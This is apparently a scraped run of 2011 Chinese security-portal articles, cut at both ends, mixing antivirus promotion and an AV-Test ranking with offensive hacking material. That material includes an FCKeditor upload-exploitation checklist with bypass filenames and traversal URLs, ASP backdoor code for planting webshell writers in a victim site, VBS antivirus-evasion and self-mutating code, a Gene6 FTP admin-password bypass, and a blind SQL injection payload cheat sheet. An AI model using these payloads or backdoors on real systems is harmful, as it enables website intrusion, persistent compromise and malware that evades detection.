/><br /><strong>常見問題<br /><br />1. 免費極速殺毒套裝如何完整、立體的保護電腦安全?<br /><br />答:</strong>免費極速殺毒套裝集成了QQ電腦管家和金山毒霸獵豹版,互補優勢,構建全安全防御體系,運行速度快,系統占用小,全方位保護電腦安全。<br /><br /><strong>(1)QQ電腦管家強勁四核引擎 + 實時防護七大體系,提前阻斷木馬等各類風險入侵電腦<br /><br /><strong>四核木馬查殺引擎</strong></strong>:大大提高木馬查殺能力,查殺更快更徹底。<br /><strong>系統防火墻</strong>:精選易受病毒木馬侵襲的關鍵位置,全方位保護您的系統安全。<br /><strong>網頁防火墻</strong>:有效攔截包含木馬或欺詐信息的網址,保護上網安全。<br /><strong>U盤防火墻</strong>:實時監控U盤,防止病毒木馬通過U盤入侵系統。<br /><strong>攝像頭保護</strong>:防止攝像頭被偷偷打開,保護您的隱私安全。<br /><strong>財產保鏢</strong>:保護您的聊天、網購、網游等軟件中的帳號及財產安全。<br /><strong><strong>下載保護</strong></strong>:檢測下載文件和聊天接收文件的安全性,防止木馬入侵?!?<br /><strong>漏洞防火墻</strong>:自動檢測系統最新漏洞,及時提醒修復。<br /><br /><strong>(2)金山毒霸獵豹版革命性殺毒體系,極速處理最新病毒<br /><br />30核云引擎</strong>:超越30倍的查殺能力,電腦卻依然如飛。<br /><strong><strong>99秒云鑒定</strong></strong>:全球首屈一指的云安全引擎以及專業病毒分析師隨時待命,比傳統殺毒軟件快60倍的鑒定速度。<br /><strong>獨家邊界防御</strong>:依托獨家99秒極速鑒定技術,為您的電腦建立完整防線,病毒進不來了!<br /><br /><strong>2. 免費極速殺毒套裝如何實現“極速”呢?<br /><br />答:</strong>“極速殺毒套裝”,運行速度快,系統占用小,秒殺全新病毒,難以置信的輕巧快速。使用相近的系統資源占用,獲得雙重的安全保障。<br /><br /><strong>(1)系統占用小</strong><br /><br />“極速殺毒套裝”是基于云的殺毒套裝,系統資源占用只需增加10MB。相對同類安全套裝中,系統資源占用最小。<br /><br /><strong>(2)運行速度快</strong><br /><br />“極速殺毒套裝”采用邊界防御,基本不占用系統資源,本地的主動防御因為結合云引擎,因此也非常輕巧。<br /><br /><strong>3. “極速殺毒套裝”速度這么快,體積這么小,效果會變差嗎?<br /><br />答:</strong>(1)QQ電腦管家強勁的四核木馬查殺引擎,大大提高木馬查殺能力,讓查殺更快更徹底。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/20118422852131.jpg" /><br /><br />(2)金山毒霸獵豹版已經全面云端化,不需要保留本地臃腫的病毒庫,不需要龐大的病毒查殺引擎。<br /><br />(3)金山毒霸獵豹版是完全基于云的殺毒軟件,省去了本地復雜的病毒鑒定模塊,因此極大的減少了掃描耗時。于此同時,在云端擁有30款各類病毒鑒定引擎,殺毒效果更好。<br /><br />(4)產品模塊化,免費極速殺毒套裝做到安裝包只有基礎查殺防御功能,用戶可以根據自己的喜歡選擇下載其他輔助功能工具。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/20118422852184.jpg" /> <img alt="" src="https://pic.cr173.com/up/2011-8/20118422853689.jpg" /><br /><br /><strong>4. “極速殺毒套裝”采用了哪些云技術?<br /><br />答:</strong>免費極速殺毒套裝采用國內外領先的云技術使得體積更小,查殺效果更好。金山云技術已獲得英國西海岸三項國際認證。<br /><br /><strong>(1)QQ電腦管家軟件云搜索</strong><br /><br />軟件云搜索是QQ電腦管家提供的一種軟件搜索服務。該服務綜合了目前國內主流的軟件下載網站,通過它能夠跨平臺搜索到各種最新應用軟件。<br /><br /><strong>(2)QQ電腦管家木馬云查殺</strong><br /><br />依靠騰訊龐大的數億用戶平臺和強大的運營體系,QQ電腦管家木馬云查殺服務能力迅速增強,專業查殺最新流行木馬。<br /><br /><strong>(3)金山毒霸獵豹采用30核云引擎</strong><br /><br />超越30倍的查殺能力,電腦卻依然如飛擁有30核查殺引擎意味著查殺能力數十倍于傳統殺毒軟件, 而配置在云端的設計體系,絲毫不占用您寶貴的電腦內存。<br /><br /><strong>(4)金山毒霸獵豹采用99秒云鑒定</strong><br /><br />比傳統殺毒軟件快60倍的鑒定速度,全球首屈一指的云安全引擎以及專業病毒分析師隨時待命,95%以上樣本實現99秒極速鑒定。</p> [黑客攻防]如何破解Gene6 FTP Server 的密碼 http://www.pirinnaturalssoapandspa.com//html/11222_1.html 佚名 黑客攻防 2011/8/4 11:05:48 <p>&nbsp;新一代的 FTP 服務器端軟件,支持 RFC-959 標準并增強其中的某些功能,上傳和下載都可以續傳,實時查看運行狀態,占用帶寬,還有很多功能。最新發布的新版 3.0 終于加入期待已久的遠程管理功能!看來 Serv-U 引以為榮的特色功能現在終于有了強有力的競爭對手啰! <br /></p><p>GENE6作為目前在網絡管理員建站過程中最流行的FTP服務工具,他的使用和維護都是非常方便的,自身功能也很強大,不僅僅支持眾多運行腳本還可以通過插件實現防范迅雷等入侵或資源耗盡形式的連接。然而GENE6在每次連接控制臺時都需要輸入管理員信息和密碼,那么當我們忘記這個密碼或者不小心刪除了GENE6管理員帳戶該如何恢復呢?今天就請各位讀者跟隨筆者一起學習如何找回丟失的GENE6管理員以及其密碼。</p><p>{insd m=&quot;2&quot; i=&quot;12154&quot;}<br /></p><p>筆者以GENE6為例進行介紹,平時要對GENE6 FTP的設置進行修改的話必須通過GENE6管理控制臺來完成,每次登錄該控制臺都需要我們輸入管理員帳戶信息與密碼,那么當我們忘記這個帳戶密碼后該用什么方法來解決呢?筆者提供三種方法。</p><p>(如圖1) </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441100415883.jpg" /></p><p>圖1</p><p>  <strong>二,刪除INI文件法:</strong></p><p>  在GENE6安裝目錄中有一個remote.ini的文件,該文件存儲的是GENE6的管理員信息,我們可以通過編輯該文件實現破解管理員密碼的目的。</p><p>  假設我們的將GENE6主程序安裝在c:\program files\gene6 ftp server下,那么這個INI文件就在c:\program files\gene6 ftp server\remoteadmin目錄下。(如圖2)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441105173367.jpg" /></p><p>&nbsp;</p><p>圖2</p><p>  打開該INI文件后我們可以看到一些關于服務器的配置信息,包括IP地址綁定情況,開放的管理端口,管理員帳戶是否啟用,管理員帳戶名稱,管理員的密碼等。(如圖3)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/20118411541588.jpg" /></p><p>&nbsp;</p><p>圖3</p><p>  我們將這個文件通過右擊選擇“刪除”,配置文件被刪除后我們就可以順利登錄GENE6的管理端了。(如圖4)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/20118411542912.jpg" /></p><p>&nbsp;</p><p>圖4</p><p>  在我們訪問GENE6管理端時管理員登錄名為administrator,密碼隨便輸入即可,不管我們輸入什么都可以順利的連接管理控制臺。(如圖5)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441104292498.jpg" /></p><p>圖5<strong>三,編輯INI文件法:</strong></p><p>  當然直接刪除之前說的remote.ini固然可以解決問題,但是很多時候我們希望能夠保留之前的管理員部分設置,那么解決辦法就是將這個文件備份,在需要還原配置或密碼時恢復復制到原來位置即可。由于remote.ini中密碼區域對應的字符是MD5加密的,所以我們只能夠通過恢復或者GENE6已經生成的文件完成恢復工作。覆蓋文件后我們也可以順利的連接GENE6 FTP管理控制臺。(如圖6)</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201188441103464300.jpg" /></p><p>圖6</p><p>  <strong>四,總結:</strong></p><p>  雖然我們提供了多個恢復密碼還原管理員密碼的方法,但是還是希望各位西西的讀者保管好密碼,減少亡羊補牢情況的發生。</p> [病毒漏洞]FCKeditor編輯器漏洞全面解析 http://www.pirinnaturalssoapandspa.com//html/12624_1.html 西西 病毒漏洞 2011/8/1 14:01:05 &nbsp;第一步:查看編輯器版本<br />FCKeditor/_whatsnew.html<br />—————————————————————————————<br /><br />第二步. Version 2.2 版本<br />Apache+linux 環境下在上傳文件后面加個.突破!測試通過。<br />—————————————————————————————<br /><br />第三步.Version &lt;=2.4.2 For php 在處理PHP 上傳的地方并未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!將以下保存為html文件,修改action地址。<br />&lt;form id=”frmUpload” enctype=”multipart/form-data”<br />action=”http://www.sitedir.com.cn/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=”post”&gt;Upload a new file:&lt;br&gt;<br />&lt;input type=”file” name=”NewFile” size=”50″&gt;&lt;br&gt;<br />&lt;input id=”btnUpload” type=”submit” value=”Upload”&gt;<br />&lt;/form&gt;<br />—————————————————————————————<br /><br />第四步.FCKeditor 文件上傳“.”變“_”下劃線的繞過方法<br />很多時候上傳的文件例如:shell.php.rar 或shell.php;.jpg 會變為shell_php;.jpg 這是新版FCK 的變化。<br />4.1:提交shell.php+空格繞過<br />不過空格只支持win 系統 *nix 是不支持的[shell.php 和shell.php+空格是2 個不同的文件 未測試。<br />4.2:繼續上傳同名文件可變為shell.php;(1).jpg 也可以新建一個文件夾,只檢測了第一級的目錄,如果跳到二級目錄就不受限制。<br />—————————————————————————————<br /><br />第五步. 突破建立文件夾<br />FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2Fshell.asp&amp;NewFolderName=z&amp;uuid=1244789975684<br />FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&amp;CurrentFolder=/&amp;Type=Image&amp;NewFolderName=shell.asp<br />—————————————————————————————<br /><br />第六步. FCKeditor 中test 文件的上傳地址<br />FCKeditor/editor/filemanager/browser/default/connectors/test.html<br />FCKeditor/editor/filemanager/upload/test.html<br />FCKeditor/editor/filemanager/connectors/test.html<br />FCKeditor/editor/filemanager/connectors/uploadtest.html<br />—————————————————————————————<br /><br />第七步.常用上傳地址<br />FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=/<br />FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&amp;connector=connectors/asp/connector.asp<br />FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=http://www.sitedir.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 測試通過)<br />JSP 版:<br />FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=connectors/jsp/connector.jsp<br />注意紅色部分修改為FCKeditor 實際使用的腳本語言,藍色部分可以自定義文<br />件夾名稱也可以利用../..目錄遍歷,紫色部分為實際網站地址。<br />—————————————————————————————<br /><br />第八步.其他上傳地址<br />FCKeditor/_samples/default.html<br />FCKeditor/_samples/asp/sample01.asp<br />FCKeditor/_samples/asp/sample02.asp<br />FCKeditor/_samples/asp/sample03.asp<br />FCKeditor/_samples/asp/sample04.asp<br />一般很多站點都已刪除_samples 目錄,可以試試。<br />FCKeditor/editor/fckeditor.html 不可以上傳文件,可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉至可上傳文件頁。<br />—————————————————————————————<br /><br />第九步.列目錄漏洞也可助找上傳地址<br />Version 2.4.1 測試通過<br />修改CurrentFolder 參數使用 ../../來進入不同的目錄<br />/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=../../..%2F&amp;NewFolderName=shell.asp<br />根據返回的XML 信息可以查看網站所有的目錄。<br />FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=Image&amp;CurrentFolder=%2F<br />也可以直接瀏覽盤符:<br />JSP 版本:<br />FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&amp;Type=&amp;CurrentFolder=%2F<br />—————————————————————————————<br /><br />第十步.爆路徑漏洞<br />FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=File&amp;CurrentFolder=/shell.asp<br />————————————————————————————<br /><br />第十一步. FCKeditor 被動限制策略所導致的過濾不嚴問題<br />影響版本: FCKeditor x.x &lt;= FCKeditor v2.4.3<br />脆弱描述:<br />FCKeditor v2.4.3 中File 類別默認拒絕上傳類型:<br />html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm<br />Fckeditor 2.0 &lt;= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件上傳后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而沒有使用$sExtension 為后綴.直接導致在win 下在上傳文件后面加個.來突破[未測試]!<br />而在apache 下,因為”Apache 文件名解析缺陷漏洞”也可以利用之,另建議其他上傳漏洞中定義TYPE 變量時使用File 類別來上傳文件,根據FCKeditor 的代碼,其限制最為狹隘。<br />在上傳時遇見可直接上傳腳本文件固然很好,但有些版本可能無法直接上傳可以利用在文件名后面加.點或空格繞過,也可以利用2003 解析漏洞建立xxx.asp文件夾或者上傳xx.asp;.jpg!<br />—————————————————————————————<br /><br />第十二步.最古老的漏洞,Type文件沒有限制!<br />我接觸到的第一個fckeditor漏洞了。版本不詳,應該很古老了,因為程序對type=xxx 的類型沒有檢查。我們可以直接構造上傳把type=Image 改成Type=hsren 這樣就可以建立一個叫hsren的文件夾,一個新類型,沒有任何限制,可以上傳任意腳本! [數據庫安全]巧用.mdb后綴數據庫做后門的代碼 http://www.pirinnaturalssoapandspa.com//html/12622_1.html 西西 數據庫安全 2011/8/1 13:45:50 &nbsp;我不否認n早前的那個把asp木馬寫到圖片文件中不失為一種好的方法,其實不僅可以寫到圖片啦 寫到mp3文件里寫到doc文件里都是可以的啦<br />copy 文件名/參數 + 文件名/參數 生成文件名<br />這樣的方法可以很靈活的運用來達到隱藏文件的目的,具體的參數就是/a以acsic碼方式,/b二進制方式,就不羅嗦這些了,至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴。mdb的數據庫中,前提是在我們拿到<br />一個webshell之后…<br />我們所知道的,很多站點在用戶注冊的時候要讓填好多東西例如:<br />用戶名、密碼、qq、郵箱、個人簡介、電話、聯系方式、住址一類的<br />而對應到數據庫中也都會有相應的表 字段 值<br />我今天要做的就是 我注冊一個用戶在 我的個人簡介的地方上寫入shell代碼,然后修改他站點上的一個文件,使用的時候觸發這個文件,就把我個人簡歷中的shell代碼,備份到當前目錄下<br />廢話少說了 大家看代碼<br />&lt;%<br />if request(“action”)=“firefox” then<br />fname=request.querystring(“fn”)<br />tname=request.querystring(“tn”)<br />bname=request.querystring(“bn”)<br />id=request.querystring(“id”)<br />idvalue=request.querystring(“idv”)<br />set rs=server.createobject(“ADODB.recordset”)<br />sql=“select ”&amp; bname &amp; “ from ”&amp;tname&amp; “ where ”&amp;id&amp;“=”&amp;idvalue&amp;“”“”<br />rs.open sql,conn,1,3<br />if not rs.eof then<br />content=rs(bname)<br />else<br />response.write “Nothing”<br />end if<br />set fso=Server.CreateObject(“Scripting.FileSystemObject”)<br />set txtfile=fso.createtextfile(server.mappath(fname))<br />txtfile.writeline(content)<br />txtfile.close<br />end if<br />%&gt;<br />將上邊的代碼加到站點的一個文件中 如news.asp<br />根據我們了解的信息 在其站點注冊后 下載數據庫看結構<br />我注冊的firefox名字是在 user表 其id值為119 用于存放我注冊簡歷的表字段為jl<br />那么在使用的時候我們<br />news.asp?action=firefox&amp;fn=firefox.asp&amp;tn=user&amp;bn=jl&amp;id=id&amp;idv=119<br />就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell<br />以上可以說是萬千隱藏方法中的一種 下邊再說另外一種更方便的隱藏方法<br />這個方法就和mdb后綴無關系了<br />同樣我們還是修改news.asp 將以下代碼插入到對方news.asp中<br />&lt;%<br />if request(“action”)=“firefox” then<br />n=request.form(“n”)<br />c=request.form(“c”)<br />set fso=Server.CreateObject(“Scripting.FileSystemObject”)<br />set txtfile=fso.createtextfile(server.mappath(n))<br />txtfile.writeline(c)<br />txtfile.close<br />end if<br />%&gt;<br />這段代碼相對簡單些 算是一個木馬的服務端吧。引言:好長時間了,從剛開始的站點管理器到現在流行的幾款asp后門,相信大多網管都能說出這些經典webshell的名字,如海洋、老兵、藍屏等,也相信大多數的網管學會了關鍵字的搜索方法來搜索這些木馬,當然現在的時間如果再象隱藏后門就要講些技巧啦,俗話說的好“佛高一尺,我高一丈”。 [防護教程]反黑衛士教你認識VBS病毒躲避殺毒軟件的常用伎倆 http://www.pirinnaturalssoapandspa.com//html/12576_1.html 反黑衛士 防護教程 2011/7/29 10:31:15 &nbsp;VBS腳本(visual basic scripting edition)的簡寫,它以Wsh(windows腳本宿主)為依托。借助windows提供的強大功能,成為計算機應用中強有力的工具。但是很多人利用它的強大功能編寫破壞性代碼構造惡意程序。對VBS腳本病毒的防治必須建立在對它了解的基礎上?,F在介紹本人對VBS病毒自我保護機制的認識給大家分享。以便更多的人能自己動手處理vbs病毒。<br /><br />1、改變對象的聲明方式<br /><br />譬如fso=createobject(&quot;scripting.filesystemobject&quot;),我們將其改變為 <br />fso=createobject(&quot;script&quot;+&quot;ing.filesyste&quot;+&quot;mobject&quot;),這樣反病毒軟件對其進行靜態掃描時就不會發現filesystemobject對象。 <br /><br />2、利用Execute函數 <br />巧妙運用Execute方法可以有效防治殺毒軟件查殺。很多殺毒軟件檢測VBS病毒時,會檢查程序中是否聲明使用了FileSystemObject對象,如果采用了,這會發出報警。如果病毒將這段聲明代碼轉化為字符串,然后通過Execute(String)函數執行,就可以躲避某些<br /><br />反病毒軟件。 <br /><br />3、代碼動態變化<br /><br />下面引用一個網上代碼變化引擎的例子說明<br /><br />Randomize<br />Set Of = CreateObject(&quot;Scripting.FileSystemObject&quot;) <br />’創建文件系統對象<br />vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall<br />’讀取自身代碼<br />fS=Array(&quot;Of&quot;, &quot;vC&quot;, &quot;fS&quot;, &quot;fSC&quot;) <br />’定義一個即將被替換字符的數組<br />For fSC = 0 To 3<br />vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))<br />&amp; Chr((Int(Rnd * 22) + 65)) &amp; Chr((Int(Rnd * 22) + 65))<br />&amp; Chr((Int(Rnd * 22) + 65))) <br />’取4個隨機字符替換數組fS中的字符串<br />Next<br />Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC <br />’將替換后的代碼寫回文件<br /><br />以上就是VBS腳本躲避殺軟的主要手段 [安全產品]U盤殺毒精靈---發展過程中幾個典型版本回顧 http://www.pirinnaturalssoapandspa.com//html/12575_1.html 反黑戰士 安全產品 2011/7/29 10:28:53 <p><strong>第一階段:</strong>批處理時期</p><p>作者在西南石油大學讀書期常幫助同學清理U盤里的病毒。工作雖然簡單但是無休止的重復總會讓人厭煩!于是編寫了一個輔助刪除U盤里病毒的批處理文件,代碼只有兩行:一行用來顯示U盤中所有的隱藏對象;另一行用來創建一個空的autorun.inf文件夾。后來發展成一個可以自動清理U盤中Auto病毒的工具。</p><p>下圖中簡陋抽象的面孔就是最早的批處理版本U盤殺毒精靈!</p><p><br /><img alt="" src="https://pic.cr173.com/up/2011-7/2011729102858856.jpg" /><br /><br /><br /><br /><strong>第二階段:</strong>VB做外殼,核心從批處理到VbScript再到多種代碼混合時期!</p><p>這個時期的“U盤殺毒精靈”相對純批處理代碼時期已經算是一個不小的進步了?,F在想想當時的病毒判斷邏輯雖然有點山寨,但是卻可以識別U盤中絕大多數的病毒活體!</p><p><br /><img alt="" src="https://pic.cr173.com/up/2011-7/2011729102858723.jpg" /> </p><p><strong>第三階段:</strong>全新代碼時期</p><p>發展到現在“U盤殺毒精靈”也可以用脫胎換骨來形容了。因為它相比以前的版本已經有了質的飛躍。全部核心代碼都經過重寫,拋棄了對批處理文件的依賴。完全改變了病毒判斷邏輯。經過優化的代碼可以完美的在XP、VISTA和windows7系統下運行!</p><p><br /><img alt="" src="https://pic.cr173.com/up/2011-7/2011729102858356.jpg" /><br /><br />U盤殺毒精靈 V9.9.0.8 官方授權合作版:<a href="http://www.pirinnaturalssoapandspa.com/soft/30385.html">http://www.pirinnaturalssoapandspa.com/soft/30385.html</a></p> [安全產品]2011殺毒軟件排行榜 AV-Test權威反病毒測試機構評測 http://www.pirinnaturalssoapandspa.com//html/12474_1.html 西西 安全產品 2011/7/22 11:25:31 <p>擦,國內殺毒軟件,安全軟件市場內斗不停,國外權威反病毒機構評測,沒有一家上榜。。。。鴨梨大呀?。。?!</p><p>經歷了三個月的評測,在昨日,德國獨立反病毒測試機構AV-Test公布了2011年第二季度的殺毒軟件性能評估報告!22款殺毒軟件中,有16款順利通過評測,而其中的六款不幸敗北,下面分享2011年第二季度AV-Test評測結果,同時我將國內常用殺軟評分結果按照從高到低列出以下殺毒軟件排行榜,希望對大家選擇殺毒軟件有所幫助:</p><p><img src="https://pic.cr173.com/up/2019-11/2019110518073694904.jpg" alt=""/></p><p><strong>測試平臺:</strong>Windows XP</p><p><strong>測試內容:</strong>將對殺毒軟件的防護(動態和靜態惡意代碼檢測)、修復(系統殺毒和Rootkit清除)和性能(使用該工具造成的系統變慢以及誤報數量)進行了綜合的評測!</p><p><strong>測試規則</strong>:每項測試滿分6.0,總分18分,一款殺毒軟件只有綜合得分超過11分才能通過AV-Test認證</p><p><strong>國內常用殺毒軟件測試結果</strong>:</p><table class="ke-zeroborder" cellspacing="0" cellpadding="2" width="401" border="0"><tbody><tr class="firstRow"><td valign="top" width="110"><strong>產品</strong></td><td valign="top" width="74"><strong>認證</strong></td><td valign="top" width="60"><strong>總分</strong></td><td valign="top" width="51"><strong>防護</strong></td><td valign="top" width="48"><strong>修復</strong></td><td valign="top" width="56"><strong>性能</strong></td></tr><tr><td valign="top" width="110">BitDefender</td><td valign="top" width="74">通過</td><td valign="top" width="60">17.0</td><td valign="top" width="51">6.0</td><td valign="top" width="48">5.5</td><td valign="top" width="56">5.5</td></tr><tr><td valign="top" width="110">卡巴斯基</td><td valign="top" width="74">通過</td><td valign="top" width="60">16.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.5</td><td valign="top" width="56">5.0</td></tr><tr><td valign="top" width="110">熊貓Panda</td><td valign="top" width="74">通過</td><td valign="top" width="60">16.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.5</td><td valign="top" width="56">5.0</td></tr><tr><td valign="top" width="110">F-Secure</td><td valign="top" width="74">通過</td><td valign="top" width="60">15.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.0</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">Symantec</td><td valign="top" width="74">通過</td><td valign="top" width="60">14.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">5.0</td><td valign="top" width="56">3.5</td></tr><tr><td valign="top" width="110">Avast Free 6.0</td><td valign="top" width="74">通過</td><td valign="top" width="60">13.5</td><td valign="top" width="51">5.0</td><td valign="top" width="48">4.0</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">AVG</td><td valign="top" width="74">通過</td><td valign="top" width="60">13.0</td><td valign="top" width="51">5.5</td><td valign="top" width="48">4.5</td><td valign="top" width="56">3.0</td></tr><tr><td valign="top" width="110">Eset Nod32</td><td valign="top" width="74">通過</td><td valign="top" width="60">12.5</td><td valign="top" width="51">4.0</td><td valign="top" width="48">3.0</td><td valign="top" width="56">5.5</td></tr><tr><td valign="top" width="110">Trend Micro</td><td valign="top" width="74">通過</td><td valign="top" width="60">12.0</td><td valign="top" width="51">4.0</td><td valign="top" width="48">3.5</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">Avira (小紅傘)</td><td valign="top" width="74">通過</td><td valign="top" width="60">12.0</td><td valign="top" width="51">3.5</td><td valign="top" width="48">4.5</td><td valign="top" width="56">4.0</td></tr><tr><td valign="top" width="110">MSE2.0</td><td valign="top" width="74">通過</td><td valign="top" width="60">12.0</td><td valign="top" width="51">2.5</td><td valign="top" width="48">4.5</td><td valign="top" width="56">5.0</td></tr><tr><td valign="top" width="110">Webroot</td><td valign="top" width="74">通過</td><td valign="top" width="60">11.0</td><td valign="top" width="51">2.0</td><td valign="top" width="48">5.0</td><td valign="top" width="56">4.0</td></tr><tr><td valign="top" width="110">PC Tools</td><td valign="top" width="74">未通過</td><td valign="top" width="60">10.5</td><td valign="top" width="51">4.0</td><td valign="top" width="48">4.5</td><td valign="top" width="56">2.0</td></tr><tr><td valign="top" width="110">McAfee</td><td valign="top" width="74">未通過</td><td valign="top" width="60">10.5</td><td valign="top" width="51">3.0</td><td valign="top" width="48">3.0</td><td valign="top" width="56">4.5</td></tr><tr><td valign="top" width="110">Norman</td><td valign="top" width="74">未通過</td><td valign="top" width="60">9.0</td><td valign="top" width="51">3.0</td><td valign="top" width="48">4.0</td><td valign="top" width="56">2.0</td></tr><tr><td valign="top" width="110">Comodo</td><td valign="top" width="74">未通過</td><td valign="top" width="60">7.0</td><td valign="top" width="51">3.5</td><td valign="top" width="48">1.5</td><td valign="top" width="56">3.0</td></tr></tbody></table><p>到官網查看殺軟評測結果:<a href="http://www.av-test.org/certifications" target="_blank">點擊此處進入</a>(可以了解評測殺軟具體版本)</p><p>相對于參加VB100認證評測,參加AV-Test評測的門檻較高,評測機構會根據其殺毒引擎、樣本庫、病毒檢索能力做判斷是否進行評測,一些能力較差的殺毒軟件很難進入評測名單。</p><p>在此次AV-Test評測中,很多大家熟悉的殺毒軟件如BitDefender,卡巴斯基,NOD32,賽門鐵克,Trend Micro(趨勢),Avast,小紅傘,微軟免費殺毒軟件MSE 都順利通過評測,而McAfee,Norman,Comodo等殺軟遺憾敗北,Comodo在殺毒方面較為一般,但其防火墻與HIPS是十分強大的,建議單獨使用!</p><p>評測名單中有兩款免費殺毒軟件MSE和Avast免費版參加評測,兩者各有優勢,用戶可根據自身安全需要,選擇使用!</p><p>相對于兩個月一次的VB100認證,我認為AV-Test評測更加的嚴格和全面,首先AV-Test評測的參評門檻就很高,VB100則很低,從參加評測的殺軟數量即可看出,其次,VB100只對其殺毒軟件的殺毒能力進行評測,而AV-Test評測則是進行防護,修復和性能三方面的綜合評測,例如如在VB100中通過次數也許永遠會一直居首的NOD32在AV-Test中結果只能算中上等.</p><p>希望以上最新一期的殺毒軟件排行對于大家選擇殺毒軟件有所幫助!</p> [病毒漏洞]易通企業網站系統CMSEASY 3.7最新漏洞發布 http://www.pirinnaturalssoapandspa.com//html/12453_1.html 西西 病毒漏洞 2011/7/20 8:40:20 CMSEASY易通企業網站系統也稱易通企業網站程序,是易通公司開發中國首套免費提供企業網站模板的營銷型企業網站管理系統,系統前臺生成html、完全符合SEO、同時有在線客服、潛在客戶跟蹤、便捷企業網站模板制作、搜索引擎推廣等功能的企業網站系統。 基于 PHP+Mysql 架構的網站內容管理系統,也是一個 PHP 開發平臺。 <br /><br />3.6那個版本的我爆過一次<br /><br />現在7.9日升級到了3.7版本,但是仍然存在漏洞<br /><br />依舊是那幾個文件<br /><br />lib/mods/celive/menu_top.php<br />/lib/default/ballot_act.php<br />lib/default/special_act.php<br />lib/default/guestbook_act.php<br />/lib/default/tag_act.php<br />lib/default/type_act.php<br /><br />menu_top.php<br /><br />我已經通知官網了<br /><br />希望能夠早日解決<br /> [安全產品]理解這些SQL注入技術 讓你的網站不被攻擊 http://www.pirinnaturalssoapandspa.com//html/12424_1.html 西西 安全產品 2011/7/17 10:46:26 &nbsp;Cookies注入代碼:<br />javascript:alert(document.cookie =&quot;參數= &quot;+escape(&quot;參數值 攻擊代碼&quot;))<br />如: javascript:alert(document.cookie =&quot;參數= &quot;+escape(&quot;參數值 and 1=1&quot;)) <br /><br />檢測可否注入<br />http://127.0.0.1/xx?id=11 and 1=1 (正常頁面)<br />http://127.0.0.1/xx?id=11 and 1=2 (出錯頁面)<br /><br />檢測表段的<br /><br />http://127.0.0.1/xx?id=11 and exists (select * from admin)<br /><br />檢測字段的<br /><br />http://127.0.0.1/xx?id=11 and exists (select username from admin)<br /><br />檢測ID<br /><br />http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)<br /><br />檢測長度的<br /><br />http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)<br /><br /><br />檢測長度的<br /><br />http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)<br /><br />檢測是否為MSSQL數據庫<br /><br />http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)<br /><br />檢測是否為英文<br /><br />(ACCESS數據庫)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)<br /><br />(MSSQL數據庫)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)<br /><br />檢測英文的范圍<br /><br />(ACCESS數據庫)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)<br /><br />(MSSQL數據庫)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)<br /><br />檢測那個字符<br /><br />(ACCESS數據庫)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)<br /><br />(MSSQL數據庫)<br />http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)<br /><br />常用函數<br /><br />Access:asc(字符) SQLServer:unicode(字符)<br />作用:返回某字符的ASCII碼<br /><br />Access:chr(數字) SQLServer:nchar(數字)<br />作用:與asc相反,根據ASCII碼返回字符<br /><br />Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)<br />作用:返回字符串從N個字符起長度為L的子字符串,即N到N+L之間的字符串<br /><br 